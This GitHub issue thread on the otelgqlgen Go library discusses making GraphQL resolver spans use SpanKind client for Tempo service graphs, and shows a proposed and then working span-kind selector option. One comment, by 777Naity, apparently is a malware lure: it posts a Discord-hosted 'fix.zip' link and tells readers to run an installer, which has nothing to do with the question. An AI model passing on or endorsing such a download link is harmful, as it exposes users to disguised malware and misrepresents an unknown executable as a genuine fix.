### ISSUE TITLE
SpanKind is always server

### ISSUE THREAD

**Issue by dkrizic** [ravilushqa/otelgqlgen#208]
Hi, 

thank you for your library. It works great. I am using Tempo and Service Graph. This can draw graphs for all services. It will draw a node for the service and another one for the connected database. As documented here:

https://grafana.com/docs/tempo/latest/metrics-generator/service_graphs/

I can pick up the current span using

```
span := trace.SpanFromContext(ctx)
```

and I can set the required attributes like

```
	span.SetAttributes(
		attribute.String("db.system", "mysql"),
		attribute.String("db.operation.name", "select"),
		attribute.Int("skip", *skip),
		attribute.Int("limit", *limit))
```

So far so good, but the resulting span is a server span:

<img width="864" alt="image" src="https://github.com/user-attachments/assets/8e3b07a6-3451-41f3-8b27-62bde50414da">

Those span should be of type client. Is it possible to set the the kind to client if it is calling a generated resolver function?

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ravilushqa** [comment]
Hi @dkrizic! Thanks for raising this issue—it's a valid point. After some thought, I’m not sure it’s possible to handle all use cases directly in the library, but it could be achieved with a configurable option like `SpanKindSelectorFunc`. This would let users define the `SpanKind` (e.g., client for database queries).

Would you be interested in contributing this feature? Here's a potential approach:

```go
type SpanKindSelectorFunc func(ctx context.Context, fc *graphql.FieldContext) oteltrace.SpanKind

// Example usage in InterceptField:
kind := oteltrace.SpanKindServer
if a.spanKindSelectorFunc != nil {
    kind = a.spanKindSelectorFunc(ctx, fc)
}
```

It can be used like this:

```go
tracer := otelgqlgen.Tracer{
    spanKindSelectorFunc: func(ctx context.Context, fc *graphql.FieldContext) oteltrace.SpanKind {
        // Example: Treat all database-related fields as client spans
        if strings.Contains(fc.Field.Name, "DB") {
            return oteltrace.SpanKindClient
        }
        return oteltrace.SpanKindServer
    },
}
```
Let me know what you think!

**Comment by dkrizic** [comment]
BTW: Somebody already requested to set the span kind after the span has been created:

https://github.com/open-telemetry/opentelemetry-go/issues/3953

That would be another solution to the problem.

**Comment by dkrizic** [comment]
https://github.com/dkrizic/otelgqlgen/issues/2

**Comment by dkrizic** [comment]
Looking good now, after setting the SpanKind like this:

```
	queryHandler.Use(otelgqlgen.Middleware(otelgqlgen.WithSpanKindSelector(func(operationName string) trace.SpanKind {
		switch operationName {
		case "Query/tag":
			return trace.SpanKindClient
		case "Query/tagValue":
			return trace.SpanKindClient
		case "Tag/assets":
			return trace.SpanKindClient
		case "TagValue/tag":
			return trace.SpanKindClient
		case "TagValue/asset":
		}
		return trace.SpanKindServer
	})))
```

the result looks like this:

<img width="871" alt="image" src="https://github.com/user-attachments/assets/f81bb350-4fc3-4814-9155-fa187a7ac4d5">
